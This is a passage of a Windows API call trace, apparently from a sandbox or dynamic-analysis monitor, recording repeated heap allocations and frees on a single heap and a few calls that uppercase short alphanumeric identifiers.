dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0220.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0220.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0220.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0220.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0220.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0220.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0220.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0220.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0220.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0220.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0220.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0220.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0220.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0220.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0220.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0220.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0220.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0220.932] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0220.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0220.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0220.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0220.933] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0220.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0220.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0220.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0220.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0220.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0220.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0220.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0220.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0220.933] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0220.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab950 [0220.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a745e0 [0220.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0220.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0220.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0220.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0220.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0220.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0220.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0220.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0220.934] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0220.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0220.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0220.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0220.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0220.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0220.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a745e0 | out: hHeap=0x2af0000) returned 1 [0220.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0220.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0220.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0220.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0220.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0220.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0220.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0220.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0220.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0220.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0220.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0220.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0220.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0220.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0220.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0220.935] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0220.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7b8 [0220.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74628 [0220.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0220.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0220.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0220.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0220.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0220.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0220.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0220.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0220.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0220.936] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0220.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0220.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0220.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0220.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0220.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0220.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0220.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0220.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0220.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0220.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0220.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0220.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0220.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0220.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0220.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0220.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0220.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74628 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0220.937] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0220.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.938] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0220.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0220.939] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: 